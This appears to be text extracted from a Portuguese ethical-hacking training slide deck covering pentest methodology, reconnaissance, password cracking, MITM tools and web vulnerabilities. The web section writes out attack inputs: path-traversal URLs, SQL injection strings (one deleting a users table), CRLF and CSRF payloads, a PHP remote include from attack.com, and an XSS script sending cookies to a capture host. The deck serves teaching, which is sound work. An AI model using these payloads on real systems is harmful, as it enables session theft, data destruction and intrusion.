Ethical Hacking - Certified Ethical Hacker

Prévia do material em texto

Ethical Hacking 
 Marcos Flávio Araújo Assunção 
Certified Ethical Hacker 
mflavio@defhack.com 
www.defhack.com.br 
Apresentação do palestrante 
Marcos Flávio Araújo Assunção 
Formação 
Mestrando em Sistemas de Informação, 
Universidade Fumec. 
 
Especialista em Docência para o Ensino 
Técnico Superior, Senac Minas. 
 
Especialista em Redes de Computadores, 
ESAB. Vitória, ES. 
 
Tecnólogo em Engenharia de Software, 
UNATEC. Belo Horizonte, MG. 
Marcos Flávio Araújo Assunção 
Atuação profissional 
 
 
Professor do Senac Minas e do Centro Universitário UNA 
 
Fundador da empresa DefHack Tecnologia 
(www.defhack.com.br). 
 
Palestrante e Keynote em seminários sobre Ethical Hacking 
 
Certified Ethical Hacker pelo EC-COUNCIL 
 
Autor de 9 livros sobre Hacking e Segurança 
Marcos Flávio Araújo Assunção 
Publicações 
 
Guia do Hacker 
Brasileiro 
 
Desafio Linux Hacker 
 
Segredos do Hacker 
Ético 1ª ,2ª, 3ª, 4ª e 
5ª Edições 
 
Honeypots e 
Honeynets 
 
Wireless Hacking 
Marcos Flávio Araújo Assunção 
Publicações 
Marcos Flávio Araújo Assunção 
Treinamentos em Ethical Hacking – Desde 1999 
Marcos Flávio Araújo Assunção 
Keynote em eventos de Ethical Hacking – Lisboa 2006 
Marcos Flávio Araújo Assunção 
Keynote em eventos de Ethical Hacking – Lisboa 2008 
Marcos Flávio Araújo Assunção 
Keynote em eventos de Ethical Hacking – Maputo 2014 
Marcos Flávio Araújo Assunção 
Certificações 
 
 
Certified Ethical 
 Hacker 
 
Cisco Certified 
CCNA Instructor 
Trainer 
 (ITQ) 
 
Marcos Flávio Araújo Assunção 
Citações Profissionais 
( 2003 ) EUA. The New York Times, “Brazil Becomes a 
cybercrime lab”. Por Tony Smith 
 
 
 
 
 
 
( 2007 ) Portugal. GQ Portugal, “Hacker Ético”, por Miguel 
dos Santos 
 
( 2008) Reino Unido. McMafia, “Code Orange”, Por Misha 
Glenny 
Marcos Flávio Araújo Assunção 
Valhala Honeypot 
-Detecção de 
Intrusos 
- Pote de mel 
-Grátis 
- Totalmente 
em português 
- Mais de 30 
mil usuários 
Projetos 
www.superdownloads.com.br 
Marcos Flávio Araújo Assunção 
Segurança? 
Isso existe? 
Conheces teu inimigo e conhece-te a ti mesmo; se tiveres cem 
combates a travar, cem vezes serás vitorioso – Sun Tzu 
Marcos Flávio Araújo Assunção 
Por que não estamos seguros? 
 Configurações 
malfeitas 
 Softwares com falhas 
 Redes desprotegidas 
 Proteções ineficazes 
 Falta de atualizações 
 Fator humano 
 Vulnerabilidade 
Marcos Flávio Araújo Assunção 
62milsenhas-lulzsec 
Marcos Flávio Araújo Assunção 
220 sites fora hackeados - jusbrasil 
Marcos Flávio Araújo Assunção 
Segurança por obscuridade 
 Segurança Passiva 
- Semi-automática 
- Desatualizada 
- Pouco eficiente 
 Segurança Ativa 
- Manual 
- Bastante 
atualizada 
- Alta eficiência 
Por que usar senhas 
complexas? 
Marcos Flávio Araújo Assunção 
Tipos de “Hackers” 
 Black Hat 
(Cracker) 
 
 White Hat 
(Ethical 
Hacker) 
 
 Gray Hat 
(indeciso) 
Marcos Flávio Araújo Assunção 
 Crackers famosos 
Marcos Flávio Araújo Assunção 
414s 
• Década de 80 
• Invadiram Security 
Pacific Bank e Alamos 
National Laboratory 
• Primeiro caso famoso 
na mídia 
• Contribuiu para 
aprovação de leis 
contra hacking 
Marcos Flávio Araújo Assunção 
John Draper 
• Década de 70 
• Captain Crunch 
• Apito 
• Phreaking 
•Recentemente: 
- Empresário 
- Firewall CrunchBox 
Marcos Flávio Araújo Assunção 
Robert Morris Jr. 
• Ano de 1988 
• Primeiro Worm 
• MIT 
• Derrubou 6 mil 
computadores 
• Recentemente: 
- Empresário 
- ViaWeb (Yahoo Store) 
- Y Combinator 
Marcos Flávio Araújo Assunção 
Kevin Poulsen 
• Década de 80 
• KIIS-FM e o Porsche 944 
• 51 meses de prisão 
• Recentemente: 
 - Jornalista 
 - SecurityFocus 
Marcos Flávio Araújo Assunção 
Kevin Mitnick 
• Década de 90 
• Invadiu Sun, Nokia, 
Motorola e outras 
• Free Kevin 
• Takedown 
• Atualmente: 
- Empresário e autor 
- Defensive Thinking 
- A arte de enganar 
Marcos Flávio Araújo Assunção 
Adrian Lamo 
• Década de 2000 
• Invadiu NYT, 
Microsoft e outros 
• Capturado em 2003 e 
julgado em 2004 
• Libertado em 2006 
• Recentemente 
- Analista freelancer 
- “Can you hack it” 
 
Marcos Flávio Araújo Assunção 
Adrian, Mitnick e Poulsen 
• Foram presos 
• Se tornaram famosos 
• Trabalham 
atualmente com 
segurança 
• São minoria 
 
Marcos Flávio Araújo Assunção 
O Hacker Ético é uma 
necessidade do mercado ou 
apenas uma “frescura” 
adolescente? 
Marcos Flávio Araújo Assunção 
MCT convida movimento Hacker 
brasilgov 
Marcos Flávio Araújo Assunção 
Precisa-se de Hackers experientes 
estadominas-online 
Marcos Flávio Araújo Assunção 
Governo americano recruta hackers 
globodigital 
Marcos Flávio Araújo Assunção 
Hacker Ético, um aliado na segurança. 
hojeemdia 
Marcos Flávio Araújo Assunção 
 Hacker Ético na mira das empresas 
infoexame 
Marcos Flávio Araújo Assunção 
Cresce a busca pelo Hacker Ético 
jornal-o-globo 
Marcos Flávio Araújo Assunção 
Hackers tem o apoio oficial do MCT 
olhardigital 
Marcos Flávio Araújo Assunção 
Governo federal contratará Hackers 
profissionaisti 
Marcos Flávio Araújo Assunção 
Forbes – Hacker Ético é uma das 
principais carreiras do futuro 
Marcos Flávio Araújo Assunção 
 O papel do Hacker Ético – O 
que é um Penetration Test? 
Marcos Flávio Araújo Assunção 
Você usaria um produto que nunca 
foi testado na prática? 
capacete-destruído 
Marcos Flávio Araújo Assunção 
Teste de “stress” – Uma necessidade 
real 
capacete-moto 
Marcos Flávio Araújo Assunção 
Teste de “stress” - Pressão 
capacete 
Marcos Flávio Araújo Assunção 
Teste de “stress” - Temperatura 
flame-test-helmet 
Marcos Flávio Araújo Assunção 
Penetration Test (Teste de Invasão) 
 Consiste em utilizar 
técnicas de Hackers em 
testes de stress da 
segurança de redes e 
sistemas 
 
 É a principal ferramenta 
de um Hacker Ético 
 
 Abordado pelo CEH 
(Certified Ethical Hacking) 
 
 
“Invadir para proteger” 
Marcos Flávio Araújo Assunção 
 Certificação de Hackers Éticos 
eccouncil 
Marcos Flávio Araújo Assunção 
Níveis de um Pentester / Ethical Hacker 
Nível 1 – Júnior – Tool based Penetration Tester: 
Esse profissional é aquele que somente conhece as ferramentas básicas para 
o pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas. 
Muitas vezes aprenderam as técnicas em treinamentos específicos. 
É neste nível que são “graduados” os profissionais CEH (Certified Ethical Hackers) 
Nível 2 – Pleno – Coding based Penetration Tester: 
Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts 
para a realização dos penetration tests, mas ainda utiliza muitos recursos já 
“prontos” (como o Metasploit) para acelerar o processo de teste das 
vulnerabilidades. Necessita de conhecimentos pelo menos em algoritmos e 
linguagens básicas de programação. 
Nível 3 – Sênior – Vulnerability Researcher: 
Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento 
mais avançado preferem debugar o funcionamento de softwares e protocolos 
em busca de falhas do tipo 0-day, e muitos são contratados por empresas com 
essa finalidade. O Google por exemplo costuma dar prêmios a quem descobre 
falhas no Chrome. 
Marcos Flávio Araújo Assunção 
Tipos de Penetration Test 
Black BoxWhite Box 
 
Gray Box 
Marcos Flávio Araújo Assunção 
Black Box 
 
 
Teste realizado em um sistema remoto, sem 
nenhum conhecimento do alvo. O invasor deve 
partir da estaca zero, sem informações sobre 
endereços IPs públicos, sistemas operacionais 
utilizados, tipos de roteadores e firewalls, etc. 
Esse teste visa demonstrar a visão de um 
atacante de fora da intranet da empresa. 
Marcos Flávio Araújo Assunção 
Gray Box 
 
 
 
 
 
Teste realizado entre departamentos ou sub-redes de uma 
intranet, com conhecimento parcial da estrutura. O objetivo 
desse teste é demonstrar até que ponto um funcionário 
consegue chegar caso ele decida tentar acessar um sistema 
de outro departamento ao qual ele não tem acesso legítimo. 
Nesse tipo de PenTest, temos conhecimento parcial da rede, 
como a faixa de endereços IPs utilizada na sub-rede de 
origem, o endereço IP do gateway e do servidor DNS, etc. 
Marcos Flávio Araújo Assunção 
White Box 
 
 
Teste realizado em uma intranet local, com total 
conhecimento do alvo. Nesse teste, temos o conhecimento 
total de como a rede opera, sabemos todos os dispositivos, 
endereços e sistemas operacionais utilizados. A visão de um 
teste White Box é a de um administrador de rede. Essa 
metodologia de testagem é utilizada quando desejamos 
conhecer até onde um administrador poderá ir caso deseje 
acessar dados ou obter informações, tais como conversar de 
MSN, senhas de usuários, e-mails alheios, etc. 
Marcos Flávio Araújo Assunção 
Quando se utilizar de um PenTest? 
 “Quebrar” ao 
invés de “rastrear” 
 
 PenTest x 
Perícia Forense 
 
Caso : HD do 
Daniel Dantas 
Marcos Flávio Araújo Assunção 
Metodologias de Penetration 
Test 
Marcos Flávio Araújo Assunção 
Metodologias de Penetration Test 
 O que é uma 
metodologia de 
PenTest? 
 
 Por que devemos 
seguir uma 
metodologia? 
 
 Vantagens e 
desvantagens 
 
Marcos Flávio Araújo Assunção 
Metodologias de Penetration Test 
 
OSSTMM 
○ http://www.isecom.org/osstmm/ 
 
 
 ISSAF 
○ http://www.oissg.org/issaf 
 
 
Marcos Flávio Araújo Assunção 
 OSSTMM 
 Metodologia mais popular 
 Os testes são discutidos em um alto nível 
 Inclui tecnologias únicas (RFID, 
infravermelho) 
 Não se baseia fortemente em ferramentas 
 BackTrack se baseia nessa metodologia 
OSSTMM 
 (Open Source Security Testing Methodology Manual) 
Marcos Flávio Araújo Assunção 
 OSSTMM 
 Vantagens 
 Maior flexibilidade para PenTesters 
 Atualizações frequentes 
Desvantagens 
 Maior curva de aprendizado 
• Conhecimento de ferramentas e Sistemas 
Operacionais necessários como pré-requisito 
 Versões mais novas requerem pagamento 
 
OSSTMM 
Marcos Flávio Araújo Assunção 
ISSAF 
 (Information Systems Security Assessment 
Framework) 
 
 Contém dois documentos separados 
 Gerenciamento (ISSAF0.2.1A)‏ 
 Penetration Testing (ISSAF0.2.1B)‏ 
 Checklists para Auditoria / Proteção de 
Sistemas 
 Centrado em ferramentas 
Marcos Flávio Araújo Assunção 
 Vantagens 
○ Não exige conhecimento prévio de ferramentas e 
sistemas operacionais 
○ Fornece exemplo do uso de ferramentas de 
PenTest 
 
 Desvantagens 
○ Rapidamente desatualizado 
○ Exemplos de ferramentas de PenTest não são 
extensivos 
ISSAF 
Marcos Flávio Araújo Assunção 
 O ISSAF é constituído de 5 fases: 
 Fase I – Planejamento 
 Fase II – Análise 
 Fase III – Tratamento 
 Fase IV – Resultados 
 Fase V – Manutenção 
 
Fases do ISSAF 
Marcos Flávio Araújo Assunção 
Fases de um Penetration 
Test 
Marcos Flávio Araújo Assunção 
Fases de um PenTest (Ataque) 
Marcos Flávio Araújo Assunção 
Vulnerabilidades 
 Categorias 
 
 Configuração 
 Redes 
 Dispositivos 
móveis 
 Software 
 Malware 
 Físicas 
 Humanas 
 
 Tipo 
• Cliente 
• Servidor 
 Atuação 
• Local 
• Remota 
 
 Meio 
• Informática 
• Telefone / outros 
 
Marcos Flávio Araújo Assunção 
Etapas técnicas de um PenTest 
Marcos Flávio Araújo Assunção 
FootPrinting 
Marcos Flávio Araújo Assunção 
Pesquisa inicial (FootPrinting) 
 Pesquisa geral 
 Ping e traceroute 
 Sites de emprego 
 Whois (internic e 
arin) 
 DNS Zone 
Transfer 
 Google 
 Archive.Org 
 Mail Tracking 
Marcos Flávio Araújo Assunção 
Ping e traceroute 
 Permitem descobrir informações como: 
 
- IP e nome de servidores e roteadores intermediários 
 
- Se há bloqueio de firewalls filtro de pacote 
 
Marcos Flávio Araújo Assunção 
Pesquisando sites de emprego 
 Vagas de 
emprego 
frequentemente 
revelam mais do 
que deveriam 
sobre a estrutura 
de TI de uma 
empresa 
Marcos Flávio Araújo Assunção 
Whois – Pesquisando domínios 
 Permite descobrir 
informações sobre 
um domínio 
 
 Vários sites 
podem ser 
usados. Exemplo: 
registro.br e 
internic.net 
 
 
Marcos Flávio Araújo Assunção 
Whois – Pesquisando IPs 
 ARIN.NET 
 Permite descobrir 
o range de 
endereços IP de 
uma rede pública 
 
 
Marcos Flávio Araújo Assunção 
DNS Zone Transfer 
 Transfere zonas de 
servidores DNS 
secundários 
vulneráveis 
 Pode usar o dig 
ou o nslookup 
 Exemplo 
(nslookup): 
 
server ns2.empresa.com 
set type=ANY 
ls –d empresa.com 
 
Marcos Flávio Araújo Assunção 
Google Hacking 
 Descobrir informações pelo google usando 
comandos como site, filetype, inurl e index of, 
entre outros. 
Marcos Flávio Araújo Assunção 
Archive.Org – WayBack Machine 
 Permite visualizar versões passadas de qualquer 
website já criado desde o surgimento da WEB. 
 Extremamente útil para ver a evolução de uma 
empresa 
 Mostra o “ano” de quando o site foi criado. Isso é 
muito relevante pois podemos saber quando a 
empresa começou a atuar. 
 Outra vantagem: poder “rever” o conteúdo de um 
site que já saiu do ar. 
Marcos Flávio Araújo Assunção 
Archive.Org – WayBack Machine 
Marcos Flávio Araújo Assunção 
Mail Tracking 
Mail Tracking é um serviço extremamente útil, que permite 
monitorar os e-mails que você envia para saber se o destinatário 
leu a mensagem, o horário que isto aconteceu – e o mais 
importante – o endereço IP do sistema que destinatário estava 
utilizando no momento. 
Marcos Flávio Araújo Assunção 
Mail Tracking 
Basta se cadastrar no site e mandar o seu e-mail com 
“mailtracking.com” no final da mensagem. Exemplo: 
fulano@empresa.com.br.mailtracking.com . 
 
Assim que o destinatário abrir a mensagem, logue no mailtracking 
e veja os dados capturados: 
Marcos Flávio Araújo Assunção 
Varredura e Enumeração 
Marcos Flávio Araújo Assunção 
Etapas da Varredura 
 Varredura de hosts 
(endereços IP) na 
rede 
 
 Varredura de 
portas (serviços 
ativos) 
Marcos Flávio Araújo Assunção 
Varredura de IPs 
 Tem como 
objetivo descobrir 
as máquinas 
ativas da rede 
 Ping Sweep 
 UDP Scan 
 Softwares: ping, 
hping3, nmap (-
sV), superscan, 
etc. 
Marcos Flávio Araújo Assunção 
Varredura de portas 
 Tem como 
objetivo identificar 
os serviços ativos 
no sistema 
 Softwares 
usados: NMAP, 
Superscan, etc. 
 Tipos de 
varredura: Full, 
Half-Syn, FIN, ACK, 
XMAS, NULL, UDP, 
etc. 
Marcos Flávio Araújo Assunção 
Enumeração 
 Tem como objetivo 
identificar os 
serviços rodando 
nas portas e o 
sistema 
operacional do alvo 
 Captura de 
banners 
 Fingerprint Sessão Nula (old!) 
 Regras de Firewall 
 
Marcos Flávio Araújo Assunção 
Captura de Banners 
 Basta se conectar 
ao serviço usando 
telnet 
 Muitos serviços 
não são 
configurados para 
alterar o banner 
padrão 
 Mostra o nome e a 
versão do software 
 Informação pouco 
confiável 
Marcos Flávio Araújo Assunção 
Fingerprint 
 Usa um banco de 
dados de 
“impressões digitais” 
para identificar o 
serviço 
 
 Baseia-se na análise 
do comportamento 
de pacotes 
 
Marcos Flávio Araújo Assunção 
Fingerprint com o NMAP 
Sistema Operacional: (opção –O)) 
Serviços das portas: (opção –A)) 
Marcos Flávio Araújo Assunção 
Vulnerabilidades de Senhas 
Marcos Flávio Araújo Assunção 
Autenticação por senhas 
 Senhas fracas 
 Bloqueio por tentativas 
 “Tentativa e erro” 
 Força-Bruta local 
(eficiente) 
 Força-Bruta remota 
(não tão eficiente) 
 Wordlists (dicionários) 
 Rainbow Tables 
 
Marcos Flávio Araújo Assunção 
Força-Bruta remota - xHydra 
Muito usado em 
sistemas Linux. 
 
Permite força-
bruta em diversos 
protocolos de 
aplicação: HTTP, 
FTP, SQL, VNC e 
muito mais. 
 
Entretanto, 
somente trabalha 
com wordlists. 
Marcos Flávio Araújo Assunção 
Força-Bruta remota - Brutus 
Para sistemas 
Windows 
 
Mais limitado e 
com suporte a 
menos protocolos 
que o XHydra 
 
Entretanto, 
trabalha com 
“bruteforce real” 
ao invés de 
somente wordlists 
Marcos Flávio Araújo Assunção 
Força-Bruta local - Cain 
Para sistemas 
Windows 
 
Permite tentar 
descobrir 
localmente 
diversos tipos de 
hash 
 
Tem suporte a, 
entre outros: 
LM, NTLM, MD5, 
SHA-1, WPA1, 
etc. 
Marcos Flávio Araújo Assunção 
Força-Bruta local - Cain 
Marcos Flávio Araújo Assunção 
Rainbow Tables 
São “tabelas” que 
podem ser 
geradas ou 
baixadas da 
Internet 
 
Visam “acelerar” 
o processo de 
força-bruta local 
ao pesquisar 
hashes já 
descobertos 
 
O WINRTGEN 
permite gerar 
suas próprias RTs 
Marcos Flávio Araújo Assunção 
Rainbow Tables Online 
Muitos sites 
oferecem o 
serviço de 
rainbow tables 
online 
 
Isso permite que 
você quebre 
diversos tipos de 
hash em questão 
de segundos 
 
Sites: Online 
Hash Crack e 
CrackStation, 
entre outros. 
 Marcos Flávio Araújo Assunção 
Vulnerabilidades de Rede 
Marcos Flávio Araújo Assunção 
Vulnerabilidades de rede 
Podemos dizer que as vulnerabilidades de 
rede mais comuns são: 
 
 Farejamento (sniffing) 
 Redirecionamento de tráfego 
 Spoofing 
 Hijacking 
 Man in the middle 
 
Marcos Flávio Araújo Assunção 
Farejamento de tráfego 
 Sniffers 
 Modo 
promíscuo 
 Dados sem 
criptografia 
 Passivo 
 Capturando 
 senhas 
 Limitado 
 
Marcos Flávio Araújo Assunção 
Redirecionamento de tráfego 
 Sniffing ativo 
 Farejar tráfego 
de outros 
dispositivos 
 Redirecionar o 
tráfego para o 
ponto desejado 
 ARP Poisoning 
 ICMP redirect 
 DHCP Spoofing 
 Port Stealing 
 
Marcos Flávio Araújo Assunção 
Arp Poisoning 
VLANs 
Address Resolution 
Protocol (ARP) 
Cache ARP 
Dinâmico x Estático 
Port Security não protege contra isto. 
Marcos Flávio Araújo Assunção 
ICMP Redirect 
Outro método 
interessante 
ICMP Type 5 
Redirect 
“Sou a melhor rota” 
Bom para redirecionar 
tráfego de roteadores 
 
Marcos Flávio Araújo Assunção 
DHCP Spoofing 
Spoof = falso 
Servidor DHCP 
Atribui endereços antes 
do verdadeiro servidor 
Condição de corrida 
Marcos Flávio Araújo Assunção 
Port Stealing 
Nível de enlace 
Portas do Switch 
Ethernet frames 
Spoofing/Poisoning 
 
Permite capturar o tráfego de 
VLANs mal configuradas ao se 
passar por um tronco (802.1d 
trunk) 
Marcos Flávio Araújo Assunção 
Man in The Middle 
Colocando-se no meio da 
transação 
Marcos Flávio Araújo Assunção 
Man in the Middle 
 No “meio” da 
transmissão 
 Sessão dupla 
 Local (ARP) 
 Remoto (Proxy) 
 Tráfego 
criptografado 
 
Marcos Flávio Araújo Assunção 
MITM – Lado Cliente 
Ponta Cliente 
Inicia a conexão 
Responsável por dados 
de autenticação, como 
senhas e cookies de 
sessão 
Autenticação alterada “on 
the fly” 
Marcos Flávio Araújo Assunção 
MITM – Lado Servidor 
Ponta servidor 
Responde às solicitações 
da conexão cliente 
Diz se o cliente está 
autenticado ou não 
Manipulação de html 
“Entre novamente com a 
senha” 
Marcos Flávio Araújo Assunção 
Como é possível o MITM? 
Interceptação do certificado 
“real” do servidor verdadeiro 
Chaves 
Certificado Digital “falso” 
enviado ao cliente 
Conexão dupla criptografada 
 O browser reclama, mas não 
impede na maioria dos casos 
Os avisos do browser podem 
ser removidos por outras 
técnicas 
 
 
Marcos Flávio Araújo Assunção 
Alguns protocolos suportados pelo 
MITM 
Secure Socket Layer 
(SSL) 
Secure Shell (SSHv1) 
Remote Desktop 
Protocol (RDP) 
Marcos Flávio Araújo Assunção 
Softwares de rede local para MITM 
Marcos Flávio Araújo Assunção 
CAIN 
Plataforma: 
Windows 
Redirecionamento
arp poisoning 
O mais simples 
de se utilizar 
MITM de RDP 
MITM de DNS 
 Gera os 
certificados 
automaticamente 
Marcos Flávio Araújo Assunção 
DSniff 
Plataforma: Linux 
Redirecionamento : Arp 
poisoning 
arpspoof 
macof 
webmitm 
sslmitm 
Marcos Flávio Araújo Assunção 
Ettercap 
Plataforma: Linux e 
Windows 
Redirecionamento : 
Arp Poisoning, Port 
Stealing, ICMP Redirect 
e DHCP Spoofing 
Pode sequestrar a 
sessão 
Possui diversos plug-
ins 
Marcos Flávio Araújo Assunção 
SSL Strip 
Apresentado na 
BlackHat de 2009 pelo 
criador do SSLSniff 
Utiliza novas técnicas 
de hijacking para 
capturar novas sessões 
http/https 
Não depende de 
aguardar redirect 
301/302 
 Mais eficiente que o 
ettercap e o Cain 
Marcos Flávio Araújo Assunção 
SSL Strip 
Marcos Flávio Araújo Assunção 
 Passos 
necessários 
para o SSL 
Strip funcionar: 
 
- IP Forward 
- Port redirect 
- ARP spoofing 
(poisoning) 
 
Softwares Proxy para MITM 
Marcos Flávio Araújo Assunção 
Achilles 
Plataforma: 
Windows 
Proof of concept 
Lento 
Muitos erros 
Não separa os 
dados nas conexões 
Permite alteração 
limitada “on the fly” 
Marcos Flávio Araújo Assunção 
Achilles 
Senha capturada por MITM de uma conexão HTTPS. 
Note que a janela é dos dados provenientes do lado cliente. 
Marcos Flávio Araújo Assunção 
Paros Proxy 
Plataforma: Java 
Virtual Machine 
Muitos recursos 
Mais rápido 
Separa os dados em 
diversas “pastas” 
Permite filtro para 
alteração “on the fly” 
- Ex: “senha” 
Marcos Flávio Araújo Assunção 
Spoofing e Hijacking 
Marcos Flávio Araújo Assunção 
Spoofing 
 Informações falsas 
 Autenticação 
 Cliente não precisa 
estar online 
 ARP Spoofing 
 DNS Spoofing 
 IP Spoofing 
 MAC Spoofing 
 
Marcos Flávio Araújo Assunção 
Tipos de IP Spoofing 
Blind IP Spoofing 
 
É o spoof “cego”. Acontece quando você envia o pacote com o IP 
de origem falsificado, mas como o destino está em outra rede 
você não consegue farejar e ver a resposta.: 
 
Non-Blind IP Spoofing 
 
Neste caso, você está na mesma LAN (e na mesma VLAN) da 
máquina de destino a qual você mandou o pacote spoofado. 
Então, farejando o trafégo com o wireshark ou outro sniffer você 
consegue visualiazr a “resposta”.Marcos Flávio Araújo Assunção 
Non-Blind IP Spoofing com STERM: 
Marcos Flávio Araújo Assunção 
Non-Blind IP Spoofing com STERM: 
Marcos Flávio Araújo Assunção 
DNS Spoofing 
 É um dos tipos mais 
perigosos 
 Permite enviar 
respostas “falsas” de 
consultas DNS a um 
cliente. 
 Pode ser facilmente 
realizado pelo Cain 
ou Ettercap se há 
redirecionamento de 
tráfego 
Marcos Flávio Araújo Assunção 
DNS Spoofing com CAIN 
Marcos Flávio Araújo Assunção 
Hijacking 
 Sequestro de 
sessões 
 Números de 
sequência 
 Necessita do 
cliente online 
 Ack Storm 
 Retransmissão 
Marcos Flávio Araújo Assunção 
Hijacking 
 Usando 
firesheep para 
capturar 
cookies http e 
sequestrar 
sessões 
Marcos Flávio Araújo Assunção 
 
Vulnerabilidades de 
Servidores e Aplicações 
WEB 
 
 
Marcos Flávio Araújo Assunção 
Enganos de Segurança 
 O Firewall protege meu servidor web e 
meu banco de dados 
 Acesso à porta 80 e 443 do seu servidor Web 
faz parte do seu perímetro de defesa externo 
 Vulnerabilidades no servidor Web ou em 
aplicações web podem levar à um acesso 
interno da rede… passando pelo firewall. 
Marcos Flávio Araújo Assunção 
Enganos de Segurança (cont.) 
 O IDS protege meu servidor Web e meu 
banco de dados 
 O IDS é configurado para detectar assinaturas 
de ataques bem conhecidos 
 Essas assinaturas não incluem as feitas contra 
aplicações customizadas 
Marcos Flávio Araújo Assunção 
Enganos de Segurança (cont.) 
 SSL protege meu site 
 SSL protege o transporte de dados entre o 
servidor web e o browser do usuário 
 SSL não protege contra ataques destinados ao 
cliente ou à aplicação 
 SSL é o melhor amigo dos hackers devido ao 
falso senso de segurança (vide ataques de 
MITM) 
Marcos Flávio Araújo Assunção 
Falhas clássicas em 
Servidores Web 
Marcos Flávio Araújo Assunção 
Buffer Overflow 
 Exploração de falhas muito utilizada 
ainda hoje 
 Dados de entrada > buffer (- tratamento) 
 IIS 
 Apache 
 Shell remoto ou outro payload 
 Acesso à rede interna 
 Também acontece com aplicações web 
Marcos Flávio Araújo Assunção 
Injeção de comandos em Hexa 
Codificando em hexa as strings das URLs, pode ser 
possível burlar filtros de segurança e IDS. 
 
http://www.site.com/cgi?arquivo=/etc/passwd 
 
Pode ficar assim: 
 
http://www.site.com/cgi?arquivo=/%2F%65%74%63 
%2F%70%61%73%73%77%64 
Marcos Flávio Araújo Assunção 
Codificação dupla em hexa 
Primeira: 
scripts/..%255c../winnt 
se torna: 
scripts/..%5c../winnt 
(%25 = caractere “%”) 
 
Segunda: 
scripts/..%5c../winnt 
se torna: 
scripts/..\../winnt 
Travessia de diretórios agora é possível utilizando codificação dupla 
em hexa. 
Marcos Flávio Araújo Assunção 
Barra em Unicode 
Em unicode, “%c0%af”, é o equivalente à 
barra (“/”). 
Então, um exploração ficaria: 
scripts/..%c0%af../winnt 
E seria convertido para: 
scripts/../../winnt 
Travessia de diretórios também é possível usando ofuscação 
através do Unicode 
Marcos Flávio Araújo Assunção 
Falhas em Aplicações 
Web 
Marcos Flávio Araújo Assunção 
Entrada maliciosa - Injection 
 Problema muito 
comum 
 Filtro malfeito 
 Lado servidor 
 SQL Injection 
‘’ or’=‘ 
‘ 1 = 1 -- 
Marcos Flávio Araújo Assunção 
Saída maliciosa - XSS 
 Mesmo 
princípio do 
injection 
 Tipo cliente 
 Utilizado 
normalmente 
para captura 
de cookies 
Marcos Flávio Araújo Assunção 
Problemas comuns 
 Algoritmo fraco – Muitos sites web hoje estão usando 
algoritmos lineares baseados em variáveis previsíveis, 
como tempo ou endereço IP. 
 
 Sem bloqueio de conta – Pode ser feito ataques de 
força-bruta na ID de sessão sem que o servidor web 
reclame. 
 
 Expiração indefinida – Se a sessão não expira 
facilmente, o invasor tem tempo quase ilimitado para 
tentar descobrir o ID. 
Marcos Flávio Araújo Assunção 
IDs em Campos Ocultos 
<FORM METHOD=POST ACTION="/cgi-
bin/access.cgi"> 
<input type="hidden" name="sessionID" 
value=”abc123”> 
<input type="hidden" name=“usuario" 
value=”Carol”> 
<input type="submit" name=“Logar no 
sistema"></form> 
Marcos Flávio Araújo Assunção 
Cross Site Scripting (XSS) 
 Atacante injeta scripts (JavaScript) no 
browser 
 O código é executado pelo browser para 
realizar alguma ação 
 Muito usado para roubar cookies 
 Funciona geralmente no lado cliente 
Marcos Flávio Araújo Assunção 
Cross-Site Request Forgeries (CSRF) 
 Evolução do Cross Site Scripting 
 Usar POST em vez de GET 
 Forçar o uso de forms próprios via 
TOKEN aleatório 
 Mais difícil de impedir que XSS 
 [img]http://seuforum.com/novaresposta.php?action=newthr
ead&subject=teste&body=alguma+coisa+aqui&submit=go[
/img] 
Marcos Flávio Araújo Assunção 
CRLF Injection 
 Carrier Return and Line Feed (CRLF) 
 Caracteres especiais que representam o “fim da 
linha” (end of line – EOL) 
 O servidor “verdadeiro” gera o código HTML, o que 
torna o ataque perigoso. 
 Exemplo: 
http://www.seusite.com.br/somepage.php?page=%0d%0aContent-
Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-
Type: text/html%0d%0a%0d%0a%3Chtml%3EConteúdo 
Hacker%3C/html%3E 
 
O usuário verá uma página com os dizeres “Conteúdo 
Hacker” escrito na mesma. 
 
 Marcos Flávio Araújo Assunção 
Explorando Filtros 
malfeitos 
Marcos Flávio Araújo Assunção 
PHP Injection 
 Includes mal configurados permitem que outro script 
remoto seja executado 
 Isso permite que você execute programas no sistema, 
obtenha arquivos, etc. 
<? 
 
include "$file.inc"; 
//include “http://attack.com/script.inc"; 
 
?> 
script.php?file=http://site.com/script 
<? 
 
system("ls $cmd"); 
//system("ls -la | wall bom dia"); 
 
?> 
script.php?cmd=-la | wall bom dia 
Marcos Flávio Araújo Assunção 
Exemplos de XSS 
 <script> alert(‘Oi’!) </script> 
 <script> 
location.href=“http://www.site.com/captura.cfm?c=“ + 
document.cookie</script> 
 <a href=“javas&#99;ript&#35;[código]> 
 <div style=“behaviour: url([código]);”> 
 <body onload=“[código]”> 
 <img src=“javascript:[código]”> 
Marcos Flávio Araújo Assunção 
SQL Injection 
 SQL Injection é um ataque de injeção de 
comandos causado por uma entrada de 
dados não validada corretamente 
 O atacante inclui uma entrada maliciosa 
com a intenção de alterar a consulta ao 
banco de dados realizada 
 Funciona apenas no lado servidor 
 
Marcos Flávio Araújo Assunção 
Métodos do SQL Injection 
O SQL Injection pode ser utilizado com dois 
métodos do HTTP: 
 
 GET – Nesse método a inserção dos comandos SQL é 
realizada diretamente na URL do site. 
Exemplo: GET /usuarios.asp?sobrenome=assuncao’;DELETE 
FROM users WHERE 1=‘1 HTTP/1.1 
 
 POST – Nesse método a inserção dos comandos SQL é 
feita nos campos de um formulário. Exemplo: ‘’ OR ‘=‘ 
 
 Marcos Flávio Araújo Assunção 
Tipos de SQL Injection 
Existem dois tipos básicos de SQL Injection 
 
 Error Based SQL Injection – O atacante 
detecta que o website é vulnerável 
devido a erros de SQL mostrados na tela, 
usando-os também para guiar o ataque. 
 
 Blind SQL Injection – O site é vulnerável 
a SQL Injection mas não apresenta 
nenhum tipo de erro ao atacante, o que 
torna mais difícil de detectar a falha. 
 
Marcos Flávio Araújo Assunção 
Error Based SQL Injection (POST) 
Marcos Flávio Araújo Assunção 
Error Based SQL Injection (POST) 
Marcos Flávio Araújo Assunção 
SQL Injection:Exemplo normal 1 
GET /view_account.cfm?acct_id=10 HTTP/1.1 
 
SELECT * 
FROM accounts 
WHERE acct_id = 10 
Marcos Flávio Araújo Assunção 
SQL Injection : Exemplo injeção 1 
